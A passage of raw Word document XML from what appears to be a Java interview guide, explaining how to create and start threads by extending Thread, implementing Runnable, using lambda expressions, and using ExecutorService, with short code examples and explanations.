        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A736A32"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public static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48BDD2CF"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MyRunnable task = new MyRunnable();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="354D3674"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Thread thread = new Thread(task);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2EBF27"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thread.start(); // Start the thread</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12683228"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4258ED17"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688C6CE9" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="007E3724" w:rsidRDefault="00714449" w:rsidP="007E3724">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E3724">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E3B1383" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="007E3724" w:rsidRDefault="00714449" w:rsidP="007E3724">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1189"/>
        </w:num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MyRunnable implements the Runnable interface and provides the implementation for the run() method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6885DE" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="007E3724" w:rsidRDefault="00714449" w:rsidP="007E3724">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1189"/>
        </w:num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Thread thread = new Thread(task) creates a new Thread object and passes the Runnable instance (task) to it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E48A77" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="007E3724" w:rsidRDefault="00714449" w:rsidP="007E3724">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1189"/>
        </w:num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thread.start() is used to start the execution of the run() method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A0B19A" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="007E3724" w:rsidRDefault="00714449" w:rsidP="007E3724">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E3724">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>3. Using Lambda Expression with Runnable (Java 8 and later)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CCA2787"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If you are using Java 8 or later, you can use lambda expressions to simplify the creation of threads, especially when implementing the Runnable interface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="525B43ED" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="007E3724" w:rsidRDefault="00714449" w:rsidP="007E3724">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E3724">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1249CBCB"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public class LambdaThreadExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="341BE56A"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    public static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D3CF5F7"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Runnable task = () -&gt; System.out.println("Thread is running using Lambda expression...");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B4D222"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Thread thread = new Thread(task);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31EE2E2E"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thread.start();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="196E6DA9"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C71A2CB"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E7F1AA3" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="007E3724" w:rsidRDefault="00714449" w:rsidP="007E3724">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E3724">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D2DD7B4" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="007E3724" w:rsidRDefault="00714449" w:rsidP="007E3724">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1190"/>
        </w:num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The lambda expression () -&gt; System.out.println("Thread is running using Lambda expression...") implements the run() method of the Runnable interface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B8CADE" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="007E3724" w:rsidRDefault="00714449" w:rsidP="007E3724">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1190"/>
        </w:num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The Thread object is created and the start() method is invoked to run the task.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="064B5C27" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="007E3724" w:rsidRDefault="00714449" w:rsidP="007E3724">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E3724">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>4. Using ExecutorService (Java 5 and later)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="141AEBCF"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For better thread management and resource handling, Java provides the ExecutorService interface. This is more powerful than directly creating and managing threads. It allows thread pooling, which is more efficient.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D5320A" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="007E3724" w:rsidRDefault="00714449" w:rsidP="007E3724">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E3724">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Example using ExecutorService:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78ED9005"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import java.util.concurrent.ExecutorService;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CBB0501"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import java.util.concurrent.Executors;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DBBD480" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="007E3724" w:rsidRDefault="00714449" w:rsidP="007E3724">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69D403DF"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public class ExecutorServiceExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A565E5"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public static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3542BA8A"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ExecutorService executorService = Executors.newFixedThreadPool(2); // Pool with 2 threads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BFB0A63"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48CA5207"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Runnable task = () -&gt; System.out.println("Thread is running using ExecutorService...");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B9BD1F"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34991B4A"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executorService.submit(task); // Submit a task to be executed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B8B53B"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executorService.submit(task); // Submit another task</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="790D7FFB"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F3C196"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executorService.shutdown(); // Shut down the executor service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="435665A4"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 xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64862FB9" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="007E3724" w:rsidRDefault="00714449" w:rsidP="007E3724">
      <w:p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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE1C2AC" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="007E3724" w:rsidRDefault="00714449" w:rsidP="007E3724">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E3724">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F5FAA2" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="007E3724" w:rsidRDefault="00714449" w:rsidP="007E3724">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1191"/>
        </w:num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Executors.newFixedThreadPool(2) creates a thread pool with two threads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="249CCA88" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="007E3724" w:rsidRDefault="00714449" w:rsidP="007E3724">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1191"/>
        </w:num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submit() method submits the tasks to the thread pool.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E12874B" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="007E3724" w:rsidRDefault="00714449" w:rsidP="007E3724">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1191"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E3724">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>shutdown() is called to stop the executor service after the tasks are completed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17DD1174" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="007E3724" w:rsidRDefault="00714449" w:rsidP="007E3724">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E3724">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Key Differences:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F35461" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="007E3724" w:rsidRDefault="00714449" w:rsidP="007E3724">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1192"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E3724">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Thread Class:</w:t>
      </w:r>
      <w:r w:rsidRPr="007E3724">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Allows direct control over the thread but is less flexible for managing multiple threads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF8BA6C" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="007E3724" w:rsidRDefault="00714449" w:rsidP="007E3724">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1192"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E3724">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Runnable Interface:</w:t>
      </w:r>
      <w:r w:rsidRPr="007E3724">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> More flexible and decouples the task from the thread. It can be used with other threading mechanisms like thread pools.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54148904" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="007E3724" w:rsidRDefault="00714449" w:rsidP="007E3724">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1192"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E3724">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ExecutorService:</w:t>
      </w:r>
      <w:r w:rsidRPr="007E3724">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Provides a higher-level, more efficient mechanism for managing threads, especially in scenarios with multiple tasks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D938BE" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="007E3724" w:rsidRDefault="00714449" w:rsidP="007E3724">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E3724">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Summary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5262A624" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="007E3724" w:rsidRDefault="00714449" w:rsidP="007E3724">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1193"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E3724">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>By extending Thread</w:t>
      </w:r>
      <w:r w:rsidRPr="007E3724">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Suitable for simple use cases where you don't need to reuse the task.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D8C9A1B" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="007E3724" w:rsidRDefault="00714449" w:rsidP="007E3724">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1193"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E3724">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>By implementing Runnable</w:t>
      </w:r>
      <w:r w:rsidRPr="007E3724">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: More flexible and reusable, good for passing tasks to different threads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0600CE49" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="007E3724" w:rsidRDefault="00714449" w:rsidP="007E3724">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1193"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E3724">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Using ExecutorService</w:t>
      </w:r>
      <w:r w:rsidRPr="007E3724">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Ideal for managing a pool of threads in a more scalable and efficient manner.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2330CA63" w14:textId="41B0DCDA" w:rsidR="00096260" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="000962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BDC68E5">
          <v:rect id="_x0000_i1851" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C34ECF" w14:textId="77777777" w:rsidR="003E4B77" w:rsidRPr="00CE4B95" w:rsidRDefault="003E4B77">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="282" w:name="_Toc196307762"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How to start a thread in java?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="282"/>
    </w:p>
    <w:p w14:paraId="233EFE16" w14:textId="54B55A37" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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In Java, you can start a thread using the following two primary approaches:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A65C9F"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1. By Extending the Thread Class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="033C24B2"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To start a thread by extending the Thread class, you must follow these steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3558677A" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1194"/>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Create a class that extends the Thread class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B86909C" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1194"/>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Override the run() method to define the task you want the thread to perform.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="146680A0" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1194"/>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Create an instance of the class and call the start() method to begin executing the thread.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B612655"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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19086B2A"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class MyThread extends Thread {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7303ED64"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Override</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B70BF0"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public void run() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2151E4B5"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">        System.out.println("Thread is running...");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DBFCA98"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21CC1711" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D9DA598"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public static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E67776"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MyThread thread = new MyThread();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B81A909"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thread.start(); // Start the thread</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="083E7678"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F5395E9"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24AAEDF4"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Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C77691B" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1195"/>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MyThread extends the Thread class and overrides the run() method, which defines the task the thread will perform.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C0804E1" w14:textId="77777777" w:rsidR="00714449" w:rsidRPr="00136F15" w:rsidRDefault="00714449" w:rsidP="00136F15">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1195"/>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The start() method is called to initiate the thread. This triggers the run() method to execute.</w:t>
      </w:r>
    </w:p>
